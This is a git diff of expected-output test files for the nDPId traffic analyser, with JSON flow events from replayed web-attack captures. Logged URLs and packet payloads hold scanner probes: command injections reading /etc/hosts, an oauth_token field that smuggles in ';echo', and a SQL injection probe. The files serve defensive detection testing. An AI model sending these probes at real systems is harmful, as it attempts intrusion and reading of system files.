00835{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":793,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":793,"flow_packet_id":1,"flow_last_seen":1576420278006,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":333,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":333,"pkt_l4_len":299,"thread_ts_msec":1576420278006,"pkt":"AAAAAAAAAAAAAAAACABFAAE\/YadAAEAG2g9\/AAABfwAAAcf8H5A46lj5CJ27noAYAED\/MwAAAQEICp1nAB6dZwAeR0VUIC93bHMtd3NhdC9Db29yZGluYXRvclBvcnRUeXBlMTEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29udGVudC1MZW5ndGg6IDM5DQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzE4NikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0KdHJhbnNhY3Rpb25faWQ9MSZvYXV0aF90b2tlbj0nJTNiZWNobyAn"} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":793,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":793,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278006,"flow_last_seen":1576420278006,"flow_idle_time":7580000,"flow_min_l4_payload_len":267,"flow_max_l4_payload_len":267,"flow_tot_l4_payload_len":267,"flow_avg_l4_payload_len":267,"midstream":1,"thread_ts_msec":1576420278006,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51196,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/CoordinatorPortType11","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007186)"}} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":793,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":793,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278006,"flow_last_seen":1576420278006,"flow_idle_time":7580000,"flow_min_l4_payload_len":267,"flow_max_l4_payload_len":267,"flow_tot_l4_payload_len":267,"flow_avg_l4_payload_len":267,"midstream":1,"thread_ts_msec":1576420278006,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51196,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/CoordinatorPortType11","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007186)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":794,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":794,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278008,"flow_last_seen":1576420278008,"flow_idle_time":7580000,"flow_min_l4_payload_len":271,"flow_max_l4_payload_len":271,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":271,"midstream":1,"thread_ts_msec":1576420278008,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51198,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00842{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":794,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":794,"flow_packet_id":1,"flow_last_seen":1576420278008,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"thread_ts_msec":1576420278008,"pkt":"AAAAAAAAAAAAAAAACABFAAFD5CdAAEAGV4t\/AAABfwAAAcf+H5BRed18Cunwm4AYAED\/NwAAAQEICp1nACCdZwAfR0VUIC93bHMtd3NhdC9SZWdpc3RyYXRpb25Qb3J0VHlwZVJQQzExIEhUVFAvMS4xDQpDb250ZW50LUxlbmd0aDogMzkNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MTg3KQ0KSG9zdDogMTI3LjAuMC4xDQoNCnRyYW5zYWN0aW9uX2lkPTEmb2F1dGhfdG9rZW49JyUzYmVjaG8gJw=="} -01073{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":794,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":794,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278008,"flow_last_seen":1576420278008,"flow_idle_time":7580000,"flow_min_l4_payload_len":271,"flow_max_l4_payload_len":271,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":271,"midstream":1,"thread_ts_msec":1576420278008,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51198,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/RegistrationPortTypeRPC11","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007187)"}} +01073{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":794,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":794,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278008,"flow_last_seen":1576420278008,"flow_idle_time":7580000,"flow_min_l4_payload_len":271,"flow_max_l4_payload_len":271,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":271,"midstream":1,"thread_ts_msec":1576420278008,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51198,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/RegistrationPortTypeRPC11","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007187)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":795,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":795,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278010,"flow_last_seen":1576420278010,"flow_idle_time":7580000,"flow_min_l4_payload_len":267,"flow_max_l4_payload_len":267,"flow_tot_l4_payload_len":267,"flow_avg_l4_payload_len":267,"midstream":1,"thread_ts_msec":1576420278010,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51200,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00835{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":795,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":795,"flow_packet_id":1,"flow_last_seen":1576420278010,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":333,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":333,"pkt_l4_len":299,"thread_ts_msec":1576420278010,"pkt":"AAAAAAAAAAAAAAAACABFAAE\/OK1AAEAGAwp\/AAABfwAAAcgAH5D7EgH2VMq6xIAYAED\/MwAAAQEICp1nACKdZwAiR0VUIC93bHMtd3NhdC9QYXJ0aWNpcGFudFBvcnRUeXBlMTEgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcxODgpDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KQ29udGVudC1MZW5ndGg6IDM5DQpIb3N0OiAxMjcuMC4wLjENCg0KdHJhbnNhY3Rpb25faWQ9MSZvYXV0aF90b2tlbj0nJTNiZWNobyAn"} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":795,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":795,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278010,"flow_last_seen":1576420278010,"flow_idle_time":7580000,"flow_min_l4_payload_len":267,"flow_max_l4_payload_len":267,"flow_tot_l4_payload_len":267,"flow_avg_l4_payload_len":267,"midstream":1,"thread_ts_msec":1576420278010,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51200,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/ParticipantPortType11","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007188)"}} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":795,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":795,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278010,"flow_last_seen":1576420278010,"flow_idle_time":7580000,"flow_min_l4_payload_len":267,"flow_max_l4_payload_len":267,"flow_tot_l4_payload_len":267,"flow_avg_l4_payload_len":267,"midstream":1,"thread_ts_msec":1576420278010,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51200,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/ParticipantPortType11","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007188)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":796,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":796,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278012,"flow_last_seen":1576420278012,"flow_idle_time":7580000,"flow_min_l4_payload_len":277,"flow_max_l4_payload_len":277,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":277,"midstream":1,"thread_ts_msec":1576420278012,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51202,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00851{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":796,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":796,"flow_packet_id":1,"flow_last_seen":1576420278012,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":343,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":343,"pkt_l4_len":309,"thread_ts_msec":1576420278012,"pkt":"AAAAAAAAAAAAAAAACABFAAFJWQ5AAEAG4p5\/AAABfwAAAcgCH5Cjm2BUk9d3uYAYAED\/PQAAAQEICp1nACSdZwAkR0VUIC9sb2dpbi5jZ2k\/Y2xpPWFhJTIwYWElMjdjYXQlMjAvZXRjL2hvc3RzIEhUVFAvMS4xDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KQ29udGVudC1MZW5ndGg6IDM5DQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MjM0KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCnRyYW5zYWN0aW9uX2lkPTEmb2F1dGhfdG9rZW49JyUzYmVjaG8gJw=="} -01080{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":796,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":796,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278012,"flow_last_seen":1576420278012,"flow_idle_time":7580000,"flow_min_l4_payload_len":277,"flow_max_l4_payload_len":277,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":277,"midstream":1,"thread_ts_msec":1576420278012,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51202,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.cgi?cli=aa%20aa%27cat%20\/etc\/hosts","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007234)"}} +01080{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":796,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":796,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278012,"flow_last_seen":1576420278012,"flow_idle_time":7580000,"flow_min_l4_payload_len":277,"flow_max_l4_payload_len":277,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":277,"midstream":1,"thread_ts_msec":1576420278012,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51202,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.cgi?cli=aa%20aa%27cat%20\/etc\/hosts","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007234)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":797,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278014,"flow_last_seen":1576420278014,"flow_idle_time":7580000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51204,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00822{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":797,"flow_packet_id":1,"flow_last_seen":1576420278014,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":323,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":323,"pkt_l4_len":289,"thread_ts_msec":1576420278014,"pkt":"AAAAAAAAAAAAAAAACABFAAE1Ck9AAEAGMXJ\/AAABfwAAAcgEH5AitzMTI6HHCIAYAED\/KQAAAQEICp1nACadZwAmR0VUIC9zaGVsbD9jYXQrL2V0Yy9ob3N0cyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzIzNSkNCkNvbnRlbnQtTGVuZ3RoOiAzOQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkhvc3Q6IDEyNy4wLjAuMQ0KDQp0cmFuc2FjdGlvbl9pZD0xJm9hdXRoX3Rva2VuPSclM2JlY2hvICc="} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":797,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278014,"flow_last_seen":1576420278014,"flow_idle_time":7580000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51204,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/shell?cat+\/etc\/hosts","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007235)"}} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":797,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278014,"flow_last_seen":1576420278014,"flow_idle_time":7580000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51204,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/shell?cat+\/etc\/hosts","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007235)"}} 00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":745,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277895,"flow_last_seen":1576420277895,"flow_idle_time":7580000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51052,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":746,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277896,"flow_last_seen":1576420277896,"flow_idle_time":7580000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":192,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51054,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":747,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277898,"flow_last_seen":1576420277898,"flow_idle_time":7580000,"flow_min_l4_payload_len":188,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":188,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51056,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -3197,9 +3197,9 @@ ~~ total active/idle flows...: 797/797 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6859539 bytes -~~ total memory freed........: 6859539 bytes -~~ total allocations/frees...: 126032/126032 +~~ total memory allocated....: 6993173 bytes +~~ total memory freed........: 6993173 bytes +~~ total allocations/frees...: 128794/128794 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 468 chars ~~ json string max len.......: 1395 chars diff --git a/test/results/WebattackSQLinj.pcap.out b/test/results/WebattackSQLinj.pcap.out index 9b4c861ae..efaf4ee05 100644 --- a/test/results/WebattackSQLinj.pcap.out +++ b/test/results/WebattackSQLinj.pcap.out @@ -4,56 +4,56 @@ 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1499348407419,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348407419,"pkt":"ABm5CmnxAMGxFOsxCABFAAA84aRAAD4G5CusEAABwKgKMo1kAFAWk4RJAAAAAKACchDPRwAAAgQFtAQCCAoBPmXtAAAAAAEDAwc="} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1499348407419,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348407419,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjWS7EzBkFpOESqAScSCpZgAAAgQFtAQCCAoD6DdgAT5l7QEDAwc="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1499348407420,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348407420,"pkt":"ABm5CmnxAMGxFOsxCABFAAA04aVAAD4G5DKsEAABwKgKMo1kAFAWk4RKuxMwZYAQAOVIbgAAAQEICgE+Ze0D6Ddg"} -00993{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348407419,"flow_last_seen":1499348407420,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":447,"flow_tot_l4_payload_len":447,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1499348407420,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36196,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00993{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348407419,"flow_last_seen":1499348407420,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":447,"flow_tot_l4_payload_len":447,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1499348407420,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36196,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348413192,"flow_last_seen":1499348413192,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348413192,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36198,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1499348413192,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348413192,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8\/kNAAD4Gx4ysEAABwKgKMo1mAFAV3ZXTAAAAAKACchC4zgAAAgQFtAQCCAoBPmuQAAAAAAEDAwc="} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1499348413192,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348413192,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjWbwopjJFd2V1KAScSDvVQAAAgQFtAQCCAoD6D0DAT5rkAEDAwc="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1499348413193,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348413193,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0\/kRAAD4Gx5OsEAABwKgKMo1mAFAV3ZXU8KKYyoAQAOWOXQAAAQEICgE+a5AD6D0D"} 